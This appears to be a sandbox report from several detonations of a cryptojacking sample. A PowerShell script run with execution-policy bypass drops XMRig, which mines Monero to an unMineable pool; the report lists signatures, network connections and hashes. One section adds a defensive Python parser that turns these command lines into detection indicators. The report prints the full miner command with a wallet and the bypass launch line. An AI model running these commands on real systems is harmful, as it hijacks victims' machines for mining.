| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3452 wrote to memory of 4060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3452 wrote to memory of 4060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| NL | 23.62.61.59:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 59.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zehadbiy.zja.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
290s
Max time network
295s
Command Line
Signatures
xmrig
XMRig Miner payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1844 wrote to memory of 3916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1844 wrote to memory of 3916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cvtsetc3.b2x.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | cc47e5a5d54802233f04eece2ec71d2f |
| SHA1 | dcf2aa584ac92d9646d9ef6348f859ed16bb58b2 |
| SHA256 | 4efb5c3869432797304221fd43c352d864898f1573bb8fbcbbc69d1c724a6e58 |
| SHA512 | d3dc234152b581f502f803dbbb07a88b476022cc1ffdec76d6e301563c001a742d1cb5be140fb9c9a6c1ad2c1ce23840b6da7ffa15261f893c74cfb1a11f6e56 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
299s
Max time network
292s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3496 wrote to memory of 2768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3496 wrote to memory of 2768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ronmz524.3yt.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
305s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2236 wrote to memory of 1104 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2236 wrote to memory of 1104 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.56:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 56.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.136:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svplhplo.4c4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
295s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3440 wrote to memory of 4572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3440 wrote to memory of 4572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
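The two command lines above are the whole chain for this sample: powershell.exe launched with -ExecutionPolicy bypass on a script in %TEMP%, which fetched xmrig-6.21.3 from GitHub (the objects.githubusercontent.com connection in the Network table) and started it against unMineable's RandomX pool over TLS on port 443. The SeLockMemoryPrivilege rows under AdjustPrivilegeToken are XMRig enabling large pages for RandomX, so that privilege on a fresh binary under %TEMP% is a good corroborating signal. The Python below is an added example, not part of this report or of any tool it names. It tokenizes a Windows command line without shlex (which strips the backslashes in paths), pulls the pool host, port, TLS flag, coin, wallet and worker out of the XMRig arguments (the -o/--url= and -u/--user spellings are taken from XMRig's documented options), flags the ExecutionPolicy-bypass-plus-%TEMP%-script launch pattern, and wraps both in a predicate usable on process-creation events. The -ep/-exec switch spellings and the stratum scheme list are assumptions, not from the page.

```python
"""Extract mining-pool and launch-pattern IOCs from the process command lines in this report."""
import re
from urllib.parse import urlsplit

# Both command lines are copied from this report's behavioral4 process list.
POWERSHELL_CMD = ('powershell.exe -ExecutionPolicy bypass -File '
                  '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (4).ps1"')
XMRIG_CMD = ('"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
             '-o stratum+ssl://rx.unmineable.com:443 '
             '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
             '.unmineable_worker_vilqtiac -p x')

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace while keeping quoted paths whole.
    shlex.split is deliberately not used: in POSIX mode it eats the backslashes in paths."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


# Option spellings XMRig accepts for the fields worth extracting (short and long form).
_XMRIG_OPTS = {'-a': 'algo', '--algo': 'algo', '-o': 'url', '--url': 'url',
               '-u': 'user', '--user': 'user', '-p': 'pass', '--pass': 'pass'}


def parse_xmrig(cmdline):
    """Return pool, wallet and worker details from an XMRig-style command line,
    or None when the line carries no pool URL at all."""
    toks = tokenize(cmdline)
    opts = {}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith('--') and '=' in tok:          # --url=stratum+ssl://host:port
            key, value = tok.split('=', 1)
            if key in _XMRIG_OPTS:
                opts[_XMRIG_OPTS[key]] = value
            i += 1
        elif tok in _XMRIG_OPTS and i + 1 < len(toks):   # -o stratum+ssl://host:port
            opts[_XMRIG_OPTS[tok]] = toks[i + 1]
            i += 2
        else:
            i += 1
    if 'url' not in opts:
        return None
    url = opts['url']
    if '://' not in url:
        url = 'stratum+tcp://' + url      # XMRig treats a bare host:port as plain TCP
    parts = urlsplit(url)
    user = opts.get('user', '')
    # unMineable logins are COIN:ADDRESS.WORKER; ordinary pools use ADDRESS[.WORKER]
    coin, _, rest = user.partition(':') if ':' in user else ('', '', user)
    wallet, _, worker = rest.partition('.')
    return {
        'image': toks[0],
        'algo': opts.get('algo', ''),
        'pool_host': parts.hostname or '',
        'pool_port': parts.port,
        'tls': parts.scheme.endswith(('ssl', 'tls')),
        'coin': coin,
        'wallet': wallet,
        'worker': worker,
        'pool_pass': opts.get('pass', ''),
    }


# Assumed switch spellings for -ExecutionPolicy (PowerShell also accepts unique prefixes).
_EP_SWITCHES = {'-executionpolicy', '-ep', '-exec'}


def parse_powershell(cmdline):
    """Flag the launch pattern in this report: -ExecutionPolicy bypass -File <script under %TEMP%>."""
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    bypass = any(low[i] in _EP_SWITCHES and low[i + 1] in ('bypass', 'unrestricted')
                 for i in range(len(low) - 1))
    script = next((toks[i + 1] for i in range(len(toks) - 1) if low[i] in ('-file', '-f')), '')
    return {
        'execution_policy_bypass': bypass,
        'script': script,
        'script_in_temp': '\\appdata\\local\\temp\\' in script.lower(),
    }


_POOL_SCHEMES = ('stratum+tcp://', 'stratum+ssl://', 'stratum+tls://', 'stratum://')


def is_miner_cmdline(cmdline):
    """Detection predicate: a stratum URL on the line, or a parsed pool host:port plus a wallet."""
    if any(scheme in cmdline.lower() for scheme in _POOL_SCHEMES):
        return True
    info = parse_xmrig(cmdline)
    return bool(info and info['pool_host'] and info['pool_port'] and info['wallet'])


if __name__ == '__main__':
    print(parse_powershell(POWERSHELL_CMD))
    print(parse_xmrig(XMRIG_CMD))
    print('miner:', is_miner_cmdline(XMRIG_CMD), is_miner_cmdline(POWERSHELL_CMD))
```

Run process-creation command lines (Sysmon event ID 1 or the EDR equivalent) through is_miner_cmdline and keep the parsed wallet: the pool and the binary's path change between campaigns, the payout address usually does not, so it is the field to pivot on.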
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3440-0-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2shv2dcs.zoc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3440-9-0x000001F1AD0A0000-0x000001F1AD0C2000-memory.dmp
memory/3440-10-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-11-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-12-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-13-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp
memory/3440-14-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-15-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
memory/3440-17-0x000001F1C58A0000-0x000001F1C58B2000-memory.dmp
memory/3440-18-0x000001F1AD130000-0x000001F1AD13A000-memory.dmp
memory/3440-37-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
